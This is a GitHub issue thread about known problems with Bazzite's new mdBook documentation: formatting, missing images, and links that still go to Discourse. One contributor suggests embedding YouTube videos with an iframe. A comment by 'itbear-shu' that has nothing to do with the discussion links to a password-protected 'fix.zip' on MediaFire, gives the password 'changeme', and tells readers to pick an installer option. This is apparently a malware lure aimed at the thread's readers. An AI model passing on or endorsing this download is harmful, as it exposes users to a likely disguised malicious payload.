### ISSUE TITLE
[Todo List] mdBook Documentation Known Issues

### ISSUE THREAD

**Issue by nicknamenamenick** [ublue-os/bazzite#1547]
# Current Issues

- A few minor issues with formatting on certain documentation.
- Missing images on some documentation.
- Certain links still go to the Discourse documentation when it shouldn't.
- Adjust some images.

<hr>

# **Notes**:

- Bazzite documentation contributing instructions should mention adding your Github username to the bottom of "Documentation Contributors" after submitting a Pull Request.
- FAQ button on the website (the question mark after "Discourse") should link to the current FAQ or alternatively link to [Bazzite Resources](https://universal-blue.discourse.group/docs?topic=8).
- Some documentation will have to get a small revamp.
  - Is that an oxymoron? 

<hr>

# Conclusion

This new documentation will be considered "stable" next week, and the old Discourse documentation will be delisted, and there will be a link at the top of each to the new documentation.  The "Documentation" section on the forums will link to the new Documentation as opposed to old one.

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wolfyreload** [comment]
@nicknamenamenick / @Zeglius  you can quite easily keep all the Youtube videos embedded nicely in the docs by wrapping them in an iframe. E.g. for the ROG Ally video <https://youtu.be/H4226yq0ZwY> would translate to the default Youtube embedded html code

```html
<iframe width="560" height="315" src="https://www.youtube.com/embed/H4226yq0ZwY" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
```

Then all the videos that are linked in the docs will be playable from within the generated mkdocs site.
